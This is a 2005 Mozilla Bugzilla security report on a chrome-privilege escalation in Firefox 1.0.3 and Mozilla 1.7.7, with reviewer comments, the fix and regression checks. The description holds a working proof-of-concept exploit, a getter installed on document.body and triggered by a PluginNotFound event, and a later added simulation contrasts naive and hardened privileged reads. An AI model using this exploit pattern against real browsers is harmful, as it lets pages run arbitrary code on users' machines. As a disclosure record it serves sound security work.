Bug 290908 - new Script() can access chrome window and run arbitrary code with chrome privilege
Status: RESOLVED FIXED
Whiteboard: [sg:fix] trunk version rolled into 28...
Keywords: fixed-aviary1.0.4, fixed1.7.8
Product: Core
Classification: Components
Component: Security
Version: Trunk
Platform: x86 Windows XP
Importance: -- normal
Target Milestone: ---
Assigned To: Brendan Eich [:brendan]
Depends on: 281988
Blocks: sbb+
Reported: 2005-04-18 21:37 PDT by moz_bug_r_a4
Modified: 2007-04-01 14:42 PDT
Flags:
dveditz: blocking1.7.8+
asa: blocking-aviary1.0.4+
bob: in-testsuite?


Attachments
testcase 1 (622 bytes, text/html) - 2005-04-18 21:39 PDT, moz_bug_r_a4
testcase 2 (825 bytes, text/html) - 2005-04-18 21:41 PDT, moz_bug_r_a4
testcase 3 (675 bytes, text/html) - 2005-04-18 21:42 PDT, moz_bug_r_a4
fix (1.23 KB, patch) - 2005-04-19 20:03 PDT, Brendan Eich [:brendan]
  shaver: review+
  dbaron: superreview+
  asa: approval-aviary1.0.4+
  brendan: approval1.7.8+

Description moz_bug_r_a4 2005-04-18 21:37:23 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access a non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access a non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix presented in bug 289074 comment 79. The
code in a Script object can access |arguments.callee.__parent__|, which is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

Note:
It is important how the Script object is created. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
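The pattern behind testcase 1, as an added illustration that is not part of this bug report or of Mozilla's code: privileged code reads event.target.type, the node carries a content-installed getter of that name, so the getter runs inside the privileged read. FakeElement, naiveReadType, hardenedReadType, hasOwnAccessor and runScenario are constructed names for this simulation; the hardened reader captures the prototype's native getter before content runs and never dispatches through the node's own properties.

```javascript
'use strict';

// Constructed stand-in for a DOM element: the real "type" accessor lives on
// the prototype, the way a native DOM getter does in a browser.
class FakeElement {
  get type() { return 'native-type'; }
}

// Privileged handler as it behaved before the fix: a plain property read,
// which runs whatever getter the content page installed on the node.
function naiveReadType(target) {
  return target.type;
}

// Capture the trusted getter once, before any content code has run.
const trustedTypeGetter =
  Object.getOwnPropertyDescriptor(FakeElement.prototype, 'type').get;

// Hardened read: ignore the target's own properties entirely and call the
// captured native getter with the node as |this|.
function hardenedReadType(target) {
  if (!(target instanceof FakeElement)) {
    throw new TypeError('target is not an element');
  }
  return trustedTypeGetter.call(target);
}

// Audit helper: does the node carry a content-defined accessor for |name|?
// A cheap detection signal to log before privileged code touches the node.
function hasOwnAccessor(target, name) {
  const d = Object.getOwnPropertyDescriptor(target, name);
  return d !== undefined &&
    (typeof d.get === 'function' || typeof d.set === 'function');
}

// Replays the shape of testcase 1: content installs a getter named "type"
// on the body, then a PluginNotFound event is dispatched and the privileged
// handler reads event.target.type. Returns what the reader saw and whether
// content's getter ran inside the privileged read.
function runScenario(reader) {
  const body = new FakeElement();
  let contentRan = false;
  body.__defineGetter__('type', function () {
    contentRan = true;          // in the real bug: eval() with chrome privilege
    return 'spoofed';
  });
  const event = { type: 'PluginNotFound', target: body };  // constructed event
  const value = reader(event.target);
  return { value, contentRan, accessorPresent: hasOwnAccessor(body, 'type') };
}
```

runScenario(naiveReadType) reports the content getter running and returns 'spoofed'; runScenario(hardenedReadType) returns 'native-type' with the getter never invoked, while hasOwnAccessor still flags the node for logging.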
Comment 1 moz_bug_r_a4 2005-04-18 21:39:58 PDT
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
Comment 2 moz_bug_r_a4 2005-04-18 21:41:36 PDT
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
Comment 3 moz_bug_r_a4 2005-04-18 21:42:52 PDT
Created attachment 181111 [details]
testcase 3

each of the ways to create a Script object
Comment 4 Brendan Eich [:brendan] 2005-04-18 23:33:05 PDT
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Comment 5 David Baron :dbaron: ⌚️UTC+1 (mostly busy through August 4; review requests must explain patch) 2005-04-18 23:38:56 PDT
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Comment 6 Brendan Eich [:brendan] 2005-04-18 23:40:14 PDT
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Comment 7 georgi - hopefully not receiving bugspam 2005-04-19 13:20:05 PDT
The more JS can interact with chrome, the more exploits.

Especially if chrome executes JS.
Comment 8 Brendan Eich [:brendan] 2005-04-19 20:03:32 PDT
Created attachment 181234 [details] [diff] [review]
fix
Comment 9 Brendan Eich [:brendan] 2005-04-20 01:50:32 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Comment 10 Mike Shaver (:shaver -- probably not reading bugmail closely) 2005-04-20 05:47:10 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Comment 11 Brendan Eich [:brendan] 2005-04-20 09:59:22 PDT
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment 12 David Baron :dbaron: ⌚️UTC+1 (mostly busy through August 4; review requests must explain patch) 2005-04-20 13:14:04 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Comment 13 Brendan Eich [:brendan] 2005-05-09 12:21:31 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Comment 14 Brendan Eich [:brendan] 2005-05-09 12:23:06 PDT
Checked into branches.

/be
Comment 15 sairuh (rarely reading bugmail) 2005-05-09 14:26:09 PDT
Other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? Thanks!
Comment 16 Bob Clary [:bc:] 2005-05-11 17:17:41 PDT
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Comment 17 Daniel Veditz [:dveditz] 2005-05-18 13:08:16 PDT
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8